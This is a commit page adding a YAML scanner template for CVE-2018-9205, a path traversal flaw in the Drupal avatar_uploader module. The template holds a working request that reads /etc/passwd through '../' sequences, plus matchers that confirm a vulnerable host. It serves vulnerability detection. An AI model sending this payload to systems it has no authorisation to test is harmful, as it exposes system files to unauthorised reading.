Create CVE-2018-9205.yaml

patch-1
Muhammad Daffa 2021-10-11 18:22:14 +07:00 committed by GitHub
parent 7f9c1db801
commit 55caa61c96
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 28 additions and 0 deletions

View File

@ -0,0 +1,28 @@
id: CVE-2018-9205
info:
name: Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure
author: daffainfo
severity: high
description: Vulnerability in avatar_uploader v7.x-1.0-beta8 , The code in view.php doesnt verify users or sanitize the file path.
reference:
- https://www.exploit-db.com/exploits/44501
- https://nvd.nist.gov/vuln/detail/CVE-2018-9205
tags: cve,cve2018,lfi,drupal
requests:
- method: GET
path:
- "{{BaseURL}}/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200